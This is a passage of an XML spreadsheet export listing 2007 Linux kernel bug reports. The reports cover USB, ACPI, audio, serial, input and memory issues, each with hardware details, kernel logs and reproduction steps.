kernel: ======================= Steps to reproduce: compile 2.6.22-rc2 &amp;&amp; boot &amp;&amp; start GUI</t>
  </si>
  <si>
    <t>OHCI constantly attempts suspending root hub on ALi motherboard</t>
  </si>
  <si>
    <t>2007-05-19 10:10 UTC</t>
  </si>
  <si>
    <t>2007-06-06 07:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.16.20 Distribution: Mandriva, kernel is vanilla kernel.org Hardware Environment: Toshiba Portege 4000 lspci: 00:00.0 Host bridge: ALi Corporation M1644/M1644T Northbridge+Trident (rev 01) 00:01.0 PCI bridge: ALi Corporation PCI to AGP Controller 00:02.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:04.0 IDE interface: ALi Corporation M5229 IDE (rev c3) 00:06.0 Multimedia audio controller: ALi Corporation M5451 PCI AC-Link Controller Audio Device (rev 01) 00:07.0 ISA bridge: ALi Corporation M1533/M1535 PCI to ISA Bridge [Aladdin IV/V/V+] 00:08.0 Bridge: ALi Corporation M7101 Power Management Controller [PMU] 00:0a.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 08) 00:10.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 01) 00:11.0 CardBus bridge: Toshiba America Info Systems ToPIC100 PCI to Cardbus Bridge with ZV Support (rev 32) 00:11.1 CardBus bridge: Toshiba America Info Systems ToPIC100 PCI to Cardbus Bridge with ZV Support (rev 32) 00:12.0 System peripheral: Toshiba America Info Systems SD TypA Controller (rev 03) 01:00.0 VGA compatible controller: Trident Microsystems CyberBlade XPAi1 (rev 82) Software Environment: swsusp Problem Description: Kernel constantly tries suspend root hub which fails on this motherboard. Initially it also output messages to dmesg every second; now message is no more output but as debug shows kernel still constantly tries failed attepts. Workaround is to disable wakeup via sysfs; it was suggested that proper fix is to blacklist the drievr. As far as I an tell neccessary infrastructure is now available. Problem history: Initial submission: http://marc.info/?t=115064417300001&amp;r=1&amp;w=2 Later regression: http://marc.info/?t=116353774800002&amp;r=1&amp;w=2 Patch for the regression: http://marc.info/?t=116353970700001&amp;r=1&amp;w=2 Steps to reproduce: Enable USB_DEBUG and check dmesg/syslog: hub 1-0:1.0: hub_suspend ohci_hcd 0000:00:02.0: suspend root hub usb usb1: usb auto-suspend usb usb1: usb resume usb usb1: finish resume hub 1-0:1.0: hub_resume ohci_hcd 0000:00:02.0: wakeup root hub hub 1-0:1.0: state 7 ports 3 chg 0000 evt 0000 ohci_hcd 0000:00:02.0: auto-stop root hub ohci_hcd 0000:00:02.0: auto-wakeup root hub ohci_hcd 0000:00:02.0: auto-stop root hub ohci_hcd 0000:00:02.0: auto-wakeup root hub every second dmesg and .config attached</t>
  </si>
  <si>
    <t>Manually loading snd-powermac causes badness in lib/kref.c:33</t>
  </si>
  <si>
    <t>2007-05-20 12:55 UTC</t>
  </si>
  <si>
    <t>2007-09-05 09:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20 Distribution: Ubuntu Hardware Environment: PowerMac G5 Steps to reproduce: Loading snd-aoa modules.</t>
  </si>
  <si>
    <t>MTRR-related section mismatch</t>
  </si>
  <si>
    <t>2007-05-20 18:07 UTC</t>
  </si>
  <si>
    <t>Fabio Correa</t>
  </si>
  <si>
    <t>2007-10-23 13:36 UTC</t>
  </si>
  <si>
    <t>Kmem-related section mismatch</t>
  </si>
  <si>
    <t>2007-05-20 18:17 UTC</t>
  </si>
  <si>
    <t>2008-09-26 05:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.22-rc1 Distribution: Gentoo Linux, kernel vanilla-sources Portage 2.1.2.7 (default-linux/amd64/2006.1/desktop, gcc-4.1.1, glibc-2.5-r2, 2.6.22-rc1-auriga x86_64) ================================================================= System uname: 2.6.22-rc1-auriga x86_64 AMD Turion(tm) 64 X2 Mobile Technology TL-56 Gentoo Base System release 1.12.9 Timestamp of tree: Sun, 20 May 2007 13:20:01 +0000 dev-java/java-config: 1.3.7, 2.0.31-r5 dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.16.1-r3 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 Problem Description: When building the 2.6.22-rc2 kernel and modules, the following message appears: WARNING: mm/built-in.o - Section mismatch: reference to .init.text: from .text between 'kmem_cache_create' (at offset 0x23218) and 'cache_reap' WARNING: mm/built-in.o - Section mismatch: reference to .init.text: from .text between 'kmem_cache_create' (at offset 0x23247) and 'cache_reap' This is related to Bug #8514 and the .config file is there.</t>
  </si>
  <si>
    <t>No sound from speakers on Toshiba Tecra A8 Intel HDA Audio</t>
  </si>
  <si>
    <t>Ubuntu kernel 2.6.20-15</t>
  </si>
  <si>
    <t>2007-05-24 02:37 UTC</t>
  </si>
  <si>
    <t>2007-06-13 06:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: I get no sound through the speakers on my Toshiba Tecra A8 laptop with Intel HDA Audio. dmesg reports: [ 15.664000] hda_codec: Unknown model for ALC262, trying auto-probe from BIOS... I can however, get sound from the headphone socket, but that is the only way. Steps to reproduce: All distributions are symptomatic of this problem. I have also compiled the 2.6.21 vanilla kernel and the problem isn't resolved with this kernel.</t>
  </si>
  <si>
    <t>USB input death then system freeze</t>
  </si>
  <si>
    <t>Post 2.6.22 mm kernels, 2.6.23-rc0-git6</t>
  </si>
  <si>
    <t>2007-05-24 11:02 UTC</t>
  </si>
  <si>
    <t>2008-09-23 11:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: pre 2.6.21 mm kernels, non-mm 2.6.22-rc2 Distribution: Fedora Devel Hardware Environment: EHCI input on external powered hub with CK804 mainboard Software Environment: Nothing specific Problem Description: After a few hours of activity 2.6.22-rc1-mm1 and 2.6.22-rc2-mm1 will lose USB HID INPUT (keyboard or mice with no priority), then the system will freeze If the mouse/tackball is lost first switching to the console and moving the ball will output random text. Restarting gpm will rescue the mouse (but the system will lock up soon after anyway) Same system with similar config works fine with mainline or older mm kernels Last trace capture in logs before lockup: Kernel: drivers/hid/usbhid/hid-core.c: input irq status -75 received Xorg: ProcXCloseDevice to close or not ? ProcXCloseDevice to close or not ? (II) nek4k-enhanced-usb-0000:00:02.1-8.1/input1: Off (II) track-expl-usb-0000:00:02.1-8.3/input0: Off Steps to reproduce: Just run the system for some time</t>
  </si>
  <si>
    <t>Kernel drops UDP packets silently when reading from certain proc file entries</t>
  </si>
  <si>
    <t>2007-05-24 12:51 UTC</t>
  </si>
  <si>
    <t>andsve</t>
  </si>
  <si>
    <t>2008-09-26 05:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: I do not know, but I now that it exists in RHEL4 2.6.9.x kernels Distribution: All Hardware Environment: Multi core SMP Software Environment: All Problem Description: It is possible to introduce UDP packet losses by reading the proc file entry /proc/net/tcp. The really strange thing is that the error counters for packet drops are not increased. This means that the kernel introduce "silent" packet drops by just reading a proc statistics entry which is Not a good thing! I can most probably be used for denial of service attacks from no root users. When looking at the network code it does not seem possible that silent packet drops can ocurr so it is probably a quite nasty kernel bug. Steps to reproduce: * Send high speed RTP/UDP multicast traffic towards the system, 50Mbit/s. * Receive the RTP packets and check/validate the RTP counters and print out when the counter is not continous. * Do a while loop cat:ing from the /proc/net/tcp and see the packets beeing dropped but not accounted for in the counter statistics. I have reproduced this behavior on all our systems ranging from dual to quad core Xeon and Opteron and also on different OS releases, RHEL4, RHEL5, Fedora Core 5 and 6</t>
  </si>
  <si>
    <t>Problem with db9-driver - only one gamepad gets initialised</t>
  </si>
  <si>
    <t>2007-05-26 06:26 UTC</t>
  </si>
  <si>
    <t>Tomas Grahn</t>
  </si>
  <si>
    <t>2007-05-27 02:52 UTC</t>
  </si>
  <si>
    <t>There's a problem with the db9-joystick driver. If one attempts to use two joysticks (in my case, two 3-button Genesis gamepads) it'll only initialise the first one. Steps to reproduce: modprobe db9 dev=0,3 dev2=1,3 Expected result: Two joysticks should get registered. Actual result: Only one joystick (the first one, in this case the one connected to parport 0) will get registered. Workaround: To get two joysticks working, type: modprobe db9 dev=0,3 dev2=0,3 dev3=1,3 This effectively rules out using three joysticks. The problem isn't limited to Genesis gamepads either, using any type of device will render the same results.</t>
  </si>
  <si>
    <t>ACPI Exception (thermal-0412): AE_NOT_FOUND, Invalid active threshold [0] [20070126] - Clevo D4J</t>
  </si>
  <si>
    <t>2.6.22-rc3</t>
  </si>
  <si>
    <t>2007-05-28 02:06 UTC</t>
  </si>
  <si>
    <t>Márton Németh</t>
  </si>
  <si>
    <t>2009-01-17 04:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Debian Hardware Environment: Clevo D41J notebook Software Environment: Problem Description: Sometimes the following message appears in dmesg: ACPI Exception (thermal-0412): AE_NOT_FOUND, Invalid active threshold [0] [20070126] The message repeats about every 10 minutes. Steps to reproduce: Load thermal kernel module.</t>
  </si>
  <si>
    <t>no smartbattery status on Laptop</t>
  </si>
  <si>
    <t>2007-05-31 15:43 UTC</t>
  </si>
  <si>
    <t>John Floyd</t>
  </si>
  <si>
    <t>2007-07-25 23:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none Distribution: Fedora 6 Hardware Environment: Kontron Revolution Weatherproof Laptop Software Environment: Stock standard environment. All modules are Fedora distribution. Updated to latest. Problem Description: No samrtbattery entry in /proc/acpi/battery Have a specialised weatherproof laptop with a smartbattery running FC6 latest kernel. I cannot get battey monitoring going. Have loaded modules i2c_ec and sbs with out any errors. log/messages indicate that the EC driver loads with ACPI: EC HC smbus [SMB1] There is nothing from the sbs module though it is loaded and the /proc/acpi/battery directory is empty. The smartbattery can be recognized. If I run the following command ... smartbattery 1 (1 is to specify the i2c dev, needs i2c-dev module loaded) then I get battery status, which behaves properly (changes if I unplug AC etc). It shows Battery name, status , charge or discharge current, time to full/left, temperature etc. The smartbattery command came with the initial code exploring the ec-smbus interface a couple of years ago by Bruno Ducrot. However nothing shows up in the proc/acpi/battery directory under the sbs module, and therefore the gui battery indicators do not work Any suggestions? Love to get this working in the gui. Posted this to acpi group, and Alexey Starikovskiy asked me to post here with output from acpidump will be attached next John</t>
  </si>
  <si>
    <t>list_add corruption. prev-&gt;next should be next (f7d28794), but was f0df8ed4  (prev=f0df8ed4) Kernel Bug at lib/list_debug.c:33</t>
  </si>
  <si>
    <t>vanilla kernel 2.6.22-rc3 (and I try'ed with 2.6.21-fc7 fedora</t>
  </si>
  <si>
    <t>2007-06-01 04:20 UTC</t>
  </si>
  <si>
    <t>Paulo Pereira</t>
  </si>
  <si>
    <t>2008-09-23 11:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: vanilla kernel 2.6.22-rc3 Distribution:2.6.22-rc3 Hardware Environment:AMD ATHLON X2 4200+, M2V MOTHERBOARD Software Environment:AMULE Problem Description: I'm using vanilla kernel 2.6.22-rc3 (and I try'ed with 2.6.21-fc7 fedora kernel) with a huawei e220 3g, and when I open amule after sometime kernel panics:</t>
  </si>
  <si>
    <t>Serial driver 8250 does not work with ACPI enabled in BIOS</t>
  </si>
  <si>
    <t>2.6.21.5</t>
  </si>
  <si>
    <t>2007-06-01 06:10 UTC</t>
  </si>
  <si>
    <t>Matti Linnanvuori</t>
  </si>
  <si>
    <t>2008-01-12 22:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown Hardware Environment: Motherboard PMB-532LF processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Core(TM)2 CPU T5600 @ 1.83GHz stepping : 6 cpu MHz : 1833.574 cache size : 2048 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr lahf_lm bogomips : 3668.64 clflush size : 64 processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Core(TM)2 CPU T5600 @ 1.83GHz stepping : 6 cpu MHz : 1833.574 cache size : 2048 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr lahf_lm bogomips : 3666.43 clflush size : 64 Software Environment: Linux lk10 2.6.21.2 #6 SMP PREEMPT Fri Jun 1 14:43:26 EEST 2007 i686 unknown unknown GNU/Linux # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set CONFIG_SERIO_LIBPS2=y CONFIG_SERIO_RAW=m # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_VT_HW_CONSOLE_BINDING is not set # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set CONFIG_SERIAL_8250_PCI=y CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 CONFIG_SERIAL_8250_EXTENDED=y # CONFIG_SERIAL_8250_MANY_PORTS is not set CONFIG_SERIAL_8250_SHARE_IRQ=y # CONFIG_SERIAL_8250_DETECT_IRQ is not set # CONFIG_SERIAL_8250_RSA is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 # CONFIG_PRINTER is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set Problem Description: Communication with serial driver 8250 works only if ACPI is disabled in BIOS.</t>
  </si>
  <si>
    <t>ftdi_sio: BUG: unable to handle kernel NULL pointer dereference at virtual address</t>
  </si>
  <si>
    <t>2.6.21-1.3194.fc7</t>
  </si>
  <si>
    <t>2007-06-01 11:34 UTC</t>
  </si>
  <si>
    <t>2009-03-18 09:40 UTC</t>
  </si>
  <si>
    <t>Fedora 7 USB-UIRT 1. drivers/usb/serial/usb-serial.c: USB Serial support registered for FTDI USB Serial Device 2. ftdi_sio 3-2:1.0: FTDI USB Serial Device converter detected 3. BUG: unable to handle kernel NULL pointer dereference at virtual address 00000014 4. printing eip: 5. f8a1740a 6. *pde = 00000000 7. Oops: 0002 [#1] 8. SMP 9. last sysfs file: /devices/pci0000:00/0000:00:1d.7/usb5/idVendor 10. Modules linked in: ftdi_sio bluetooth snd_seq snd_ac97_codec usblp v4l1_compat fw_core snd_rawmidi sr_mod snd_pcm_oss snd_mixer_oss ac97_bus snd_util_mem usbserial e100 serio_raw snd_seq_device snd_hwdep snd_pcm emu10k1_gp cdrom mii snd_timer gameport snd soundcore iTCO_wdt snd_page_alloc i2c_i801 iTCO_vendor_support pcspkr i2c_core floppy sg joydev usb_storage ata_piix ata_generic libata sd_mod scsi_mod ext3 jbd mbcache ehci_hcd ohci_hcd uhci_hcd 11. CPU: 0 12. EIP: 0060:[&lt;f8a1740a&gt;] Not tainted VLI 13. EFLAGS: 00010246 (2.6.21-1.3194.fc7 #1) 14. EIP is at ftdi_USB_UIRT_setup+0x34/0x4e [ftdi_sio] 15. eax: 00000000 ebx: f583f400 ecx: f8a17b34 edx: f8a173d6 16. esi: f8a1dae0 edi: 00000040 ebp: f8a1dae0 esp: f582acdc 17. ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 18. Process modprobe (pid: 935, ti=f582a000 task=f5913150 task.ti=f582a000) 19. Stack: f791e464 00000246 f598fb00 f5e823c0 f8a160b5 f898690a f898855b f8a18f6f 20. f5ea06d0 f8a194fa f5ea0600 f5ea4800 f8a1dae0 00000000 00000000 00000001 21. 00000001 f583f400 00000000 c1806d60 00000001 00000001 00000001 00000000 22. Call Trace: 23. [&lt;f8a160b5&gt;] ftdi_sio_attach+0xf/0x12 [ftdi_sio] 24. [&lt;f898690a&gt;] usb_serial_probe+0x97b/0xdd1 [usbserial] 25. [&lt;c042e748&gt;] lock_timer_base+0x19/0x35 26. [&lt;c042e7a8&gt;] try_to_del_timer_sync+0x44/0x4a 27. [&lt;c05692c8&gt;] usb_resume_both+0xa1/0xb7 28. [&lt;c056947c&gt;] usb_autopm_do_device+0xb3/0xbd 29. [&lt;c04ad4dd&gt;] sysfs_create_link+0x128/0x13f 30. [&lt;c0568fd2&gt;] usb_match_one_id+0x1c/0x71 31. [&lt;c0569d2d&gt;] usb_probe_interface+0x81/0xb2 32. [&lt;c05529ab&gt;] really_probe+0xc6/0x14f 33. [&lt;c0552a78&gt;] driver_probe_device+0x44/0xa5 34. [&lt;c0552b72&gt;] __driver_attach+0x0/0xa5 35. [&lt;c0552be2&gt;] __driver_attach+0x70/0xa5 36. [&lt;c0551ffb&gt;] bus_for_each_dev+0x37/0x59 37. [&lt;c055282a&gt;] driver_attach+0x16/0x18 38. [&lt;c0552b72&gt;] __driver_attach+0x0/0xa5 39. [&lt;c05522ad&gt;] bus_add_driver+0x5e/0x15f 40. [&lt;c056985c&gt;] usb_register_driver+0x6d/0xd4 41. [&lt;f89857b5&gt;] usb_serial_register+0x1ed/0x1f6 [usbserial] 42. [&lt;f8806091&gt;] ftdi_init+0x91/0xbe [ftdi_sio] 43. [&lt;c04432e4&gt;] sys_init_module+0x16c3/0x17fa 44. [&lt;c04755f8&gt;] do_sync_read+0xc7/0x10a 45. [&lt;c0468484&gt;] do_mmap_pgoff+0x593/0x6f3 46. [&lt;c05507e5&gt;] device_remove_file+0x0/0x25 47. [&lt;c0475531&gt;] do_sync_read+0x0/0x10a 48. [&lt;c0475e85&gt;] vfs_read+0xa6/0x152 49. [&lt;c0404f70&gt;] syscall_call+0x7/0xb 50. ======================= 51. Code: ee a1 f8 00 74 1c c7 44 24 08 a4 86 a1 f8 c7 44 24 04 b7 88 a1 f8 c7 04 24 d5 88 a1 f8 e8 49 03 a1 c7 8b 43 14 8b 80 8c 01 00 00 &lt;83&gt; 48 14 30 c7 40 08 4d 00 00 00 c7 80 80 00 00 00 0f 00 00 00 52. EIP: [&lt;f8a1740a&gt;] ftdi_USB_UIRT_setup+0x34/0x4e [ftdi_sio] SS:ESP 0068:f582acdc</t>
  </si>
  <si>
    <t>panic on s3 resume with uhci_hcd module</t>
  </si>
  <si>
    <t>2.6.22.rc3 / git 2007-06-01</t>
  </si>
  <si>
    <t>2007-06-01 14:12 UTC</t>
  </si>
  <si>
    <t>2007-06-16 05:03 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: FC6 2.6.20 kernels / 2.6.21.3 Distribution: Fedora 7 Hardware Environment: Dell Inspiron 8500 Software Environment: Problem Description: I have just done a clean install of fedora 7 on my machine, replacing Fedora Core 6. When I resume my machine from suspend, it panics. My display is not reiinitialised, so using /sys/power/pm_trace I identified that the device is the following; 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 03) With the current fedora kernel (kernel-2.6.21-1.3194.fc7) I see the following backtrace on bootup: Jun 1 09:00:39 echo kernel: ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 Jun 1 09:00:39 echo kernel: BUG: warning at kernel/softirq.c:138/local_bh_enable() (Not tainted) Jun 1 09:00:39 echo kernel: [&lt;c042b0cf&gt;] local_bh_enable+0x45/0x92 Jun 1 09:00:39 echo kernel: [&lt;c06002bd&gt;] cond_resched_softirq+0x2c/0x42 Jun 1 09:00:39 echo kernel: [&lt;c059adf3&gt;] release_sock+0x4f/0x9d Jun 1 09:00:39 echo kernel: [&lt;c05c670d&gt;] tcp_sendmsg+0x90b/0x9f9 Jun 1 09:00:39 echo kernel: [&lt;c05dec95&gt;] inet_sendmsg+0x3b/0x45 Jun 1 09:00:39 echo kernel: [&lt;c0598731&gt;] sock_aio_write+0xf6/0x102 Jun 1 09:00:39 echo kernel: [&lt;c04754ee&gt;] do_sync_write+0xc7/0x10a Jun 1 09:00:39 echo kernel: [&lt;c0436e71&gt;] autoremove_wake_function+0x0/0x35 Jun 1 09:00:39 echo kernel: [&lt;c0475d47&gt;] vfs_write+0xbc/0x154 Jun 1 09:00:39 echo kernel: [&lt;c0476342&gt;] sys_write+0x41/0x67 Jun 1 09:00:39 echo kernel: [&lt;c0404f70&gt;] syscall_call+0x7/0xb Jun 1 09:00:39 echo kernel: [&lt;c0600000&gt;] __sched_text_start+0x6e8/0x89e Jun 1 09:00:39 echo kernel: ======================= I have since pulled Linus' git linux-2.6 tree (version no was 2.6.22-rc3). I built this using the default config options. In this version I still get the kernel panic, but I do not see the backtrace during bootup. Removing the uhci_hcd module allows the machine to resume without panic'ing. Last weekend I was testing the 2.6.21.3 kernel on my fc6 install and this did not panic, although exactly what options I used have been lost due to the f7 install.</t>
  </si>
  <si>
    <t>no touchpad since kernel 2.6.18</t>
  </si>
  <si>
    <t>2007-06-02 12:44 UTC</t>
  </si>
  <si>
    <t>robert</t>
  </si>
  <si>
    <t>2007-09-21 06:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18 Distribution: gentoo Hardware Environment: amd64 Problem Description: i can't find a touchpad in /proc/bus/input/devices since kernel 2.6.18 anymore. i've tried kernel 2.6.19 to 2.6.22-rc3 (suspend2, gentoo &amp; vanilla). evdev and psmouse modules are loaded. i don't think it's a configuration issue, since recent livecd distros work neither. a clue? output of /proc/bus/input/devices on kernel 2.6.18: I: Bus=0011 Vendor=0001 Product=0001 Version=ab41 N: Name="AT Translated Set 2 keyboard" P: Phys=isa0060/serio0/input0 S: Sysfs=/class/input/input0 H: Handlers=kbd B: EV=120013 B: KEY=402000000 3802078f840d001 feffffdfffefffff fffffffffffffffe B: MSC=10 B: LED=7 I: Bus=0011 Vendor=0002 Product=0007 Version=0000 N: Name="SynPS/2 Synaptics TouchPad" P: Phys=isa0060/serio1/input0 S: Sysfs=/class/input/input1 H: Handlers=mouse0 B: EV=b B: KEY=6420 70000 0 0 0 0 B: ABS=11000003 output of /proc/bus/input/devices on kernel 2.6.21: I: Bus=0011 Vendor=0001 Product=0001 Version=ab41 N: Name="AT Translated Set 2 keyboard" P: Phys=isa0060/serio0/input0 S: Sysfs=/class/input/input0 H: Handlers=kbd event0 B: EV=120013 B: KEY=402000000 3802078f840d001 feffffdfffefffff fffffffffffffffe B: MSC=10 B: LED=7 I: Bus=0019 Vendor=0000 Product=0002 Version=0000 N: Name="Power Button (FF)" P: Phys=button_power/button/input0 S: Sysfs=/class/input/input1 H: Handlers=kbd event1 B: EV=3 B: KEY=10000000000000 0 I: Bus=0019 Vendor=0000 Product=0003 Version=0000 N: Name="Sleep Button (CM)" P: Phys=PNP0C0E/button/input0 S: Sysfs=/class/input/input2 H: Handlers=kbd event2 B: EV=3 B: KEY=4000 0 0 I: Bus=0019 Vendor=0000 Product=0005 Version=0000 N: Name="Lid Switch" P: Phys=PNP0C0D/button/input0 S: Sysfs=/class/input/input3 H: Handlers=event3 B: EV=21 B: SW=1 output lspci: 00:00.0 Host bridge: ATI Technologies Inc RS480 Host Bridge (rev 10) 00:01.0 PCI bridge: ATI Technologies Inc RS480 PCI Bridge 00:10.0 CardBus bridge: Texas Instruments PCIxx21/x515 Cardbus Controller 00:10.2 FireWire (IEEE 1394): Texas Instruments OHCI Compliant IEEE 1394 Host Controller 00:10.3 Mass storage controller: Texas Instruments PCIxx21 Integrated FlashMedia Controller 00:10.4 Class 0805: Texas Instruments PCI6411, PCI6421, PCI6611, PCI6621, PCI7411, PCI7421, PCI7611, PCI7621 Secure Digital (SD) Controller 00:11.0 Network controller: RaLink RT2500 802.11g Cardbus/mini-PCI (rev 01) 00:12.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 00:19.0 PCI bridge: ALi Corporation M5249 HTT to PCI Bridge 00:1c.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:1c.1 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:1c.2 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:1c.3 USB Controller: ALi Corporation USB 2.0 Controller (rev 01) 00:1d.0 Audio device: ALi Corporation High Definition Audio/AC'97 Host Controller 00:1e.0 ISA bridge: ALi Corporation PCI to LPC Controller (rev 31) 00:1e.1 Bridge: ALi Corporation M7101 Power Management Controller [PMU] 00:1f.0 IDE interface: ALi Corporation M5229 IDE (rev c7) 01:05.0 VGA compatible controller: ATI Technologies Inc ATI Radeon XPRESS 200M 5955 (PCIE) i tried the recent 2.6.22-rc3 kernel today - no success. i thought it's time to file a bug now. thanks. best regards robert</t>
  </si>
  <si>
    <t>AE_NOT_FOUND, Processor Device is not present [20060707] - HP ML110 G4 Xeon 3040</t>
  </si>
  <si>
    <t>2007-06-02 23:00 UTC</t>
  </si>
  <si>
    <t>Marc Tuerschmann</t>
  </si>
  <si>
    <t>2008-03-14 15:00 UTC</t>
  </si>
  <si>
    <t>besse 9794</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none Distribution: Ubuntu, Centos, Fedora Hardware Environment: HP ML110 G4, Xeon 3040, 4GB RAM, newest available BIOS Software Environment: no self-compiled tools, only the kernel Problem Description: CPU Scaling isn't working When I am trying to load the acpi_cpufreq module i get FATAL: Error inserting acpi_cpufreq (...): No such device Also in the dmesg out i found the following line twice: ACPI Exception (acpi_processor-0677): AE_NOT_FOUND, Processor Device is not present [20060707] Steps to reproduce: Load acpi_cpufreq kernel module.</t>
  </si>
  <si>
    <t>2.6.21.3</t>
  </si>
  <si>
    <t>uhci_hcd:usb2 slows to 131KB/s from 846KB/s in MPS IOAPIC mode - Dell OptiPlex GX240</t>
  </si>
  <si>
    <t>2007-06-03 04:16 UTC</t>
  </si>
  <si>
    <t>Tear</t>
  </si>
  <si>
    <t>2007-07-25 20:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: None Distribution: Debian 4.0r0 ("Etch") Hardware Environment: Dell OptiPlex GX240, Pentim IV 1.7GHz Software Environment: Linux 2.6.21.3 from kernel.org Problem Description: When ACPI is disabled but IO-APIC is enabled, the USB ports on the front panel of Dell OptiPlex GX240 very slowly. (Dell OptiPlex GX240 is in the ACPI blacklist so ACPI gets set up only by acpi=ht.) This results in very slow USB performance. Copying a few photos from an USB-enabled digital camera takes five to six times longer compared to the performance when the camera is connected to one ofthe USB ports on the rear panel. If Dell OptiPlex GX240 had not been in the ACPI blacklist, this problem would show up only with kernels without ACPI compiled in. In addition, I wrote a patch which implements an IO-APIC blacklist and disables IO-APIC on Dell Optiplex GX240 if ACPI is not enabled. Please see the following threads for more information: http://marc.info/?t=118079385400003&amp;r=1&amp;w=2 http://marc.info/?t=117897881900001&amp;r=1&amp;w=2 Steps to reproduce: Find a Dell OptiPlex GX240 and boot Linux without anything appended to the kernel command line. Notice that the USB ports on the front panel work very slowly whereas the ports on the rear panel work normally. Boot with "acpi=force" *OR* "noapic" appended to the command line and notice that the USB ports on the front panel start work at normal speed.</t>
  </si>
  <si>
    <t>ACPI Exception (battery-0216): AE_SUPPORT, Extracting _BST [20070126] - Acer Aspire 1640z</t>
  </si>
  <si>
    <t>2.6.21-1.3200.fc8</t>
  </si>
  <si>
    <t>2007-06-03 11:18 UTC</t>
  </si>
  <si>
    <t>jonne</t>
  </si>
  <si>
    <t>2008-04-03 09:35 UTC</t>
  </si>
  <si>
    <t>10202 10339</t>
  </si>
  <si>
    <t>I've had the exact same problem with many many different kernels (also on the knoppix live dvd). Fedora people could not offer any help. I cannot even find out whether it's a software or a hardware fault. Distribution: Fedora 7 Hardware Environment: Acer Aspire 1640z Software Environment: Problem Description: Getting a battery exception right after HAL daemon is started. Makes system unstable (usually it freezes within several minutes) Steps to reproduce: Just booting, doing nothing special. dmesg fragment: ACPI Exception (battery-0216): AE_SUPPORT, Extracting _BST [20070126] *** SLUB kmalloc-64: Redzone Active@0xf5969cb0 slab 0xc1ae2954 [Not tainted] offset=3248 flags=0x400000c3 inuse=10 freelist=0xf5969850 Bytes b4 0xf5969ca0: 05 09 00 00 c5 0d fd ff 5a 5a 5a 5a 5a 5a 5a 5a ....</t>
